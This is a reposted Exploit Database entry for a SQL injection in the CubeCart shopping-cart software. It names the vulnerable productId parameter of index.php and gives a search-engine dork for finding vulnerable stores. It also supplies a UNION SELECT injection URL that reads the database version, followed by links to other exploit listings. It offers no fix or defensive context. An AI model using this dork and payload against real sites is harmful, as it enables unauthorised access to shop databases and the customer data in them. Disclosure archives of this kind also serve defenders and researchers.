CubeCart – ‘index.php’ SQL Injection

Exploit Database
81 阅读

作者： AtT4CKxT3rR0r1ST

日期： 2010-02-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11495/

CubeCart (index.php) Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : http://www.cubecart.com/downloads/
.:. Dork : "powered by CubeCart" inurl:"index.php?_a="

####################################################################

===[ Exploit ]===

www.site.com/index.php?_a=viewProd&productId=22[SqlSql Injection]

===[ Example ]===

http://server/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version()

####################################################################

last Exploits
CubeCart – ‘index.php’ SQL Injection的更多信息

EzBan 5.3 – ‘id’ SQL Injection：
Froxlor 0.10.29.1 – SQL Injection (Authenticated)：
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal：
Basic Analysis and Security Engine (BASE) 1.4.5 – ‘base_logout.php?base_path’ Remote File Inclusion：
Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution：
Chitor-CMS v1.1.2 – Pre-Auth SQL Injection：
GravCMS 1.10.7 – Arbitrary YAML Write/Update (Unauthenticated) (2)：
PHP Photo Album 0.4.1.16 – Multiple Disclosure Vulnerabilities：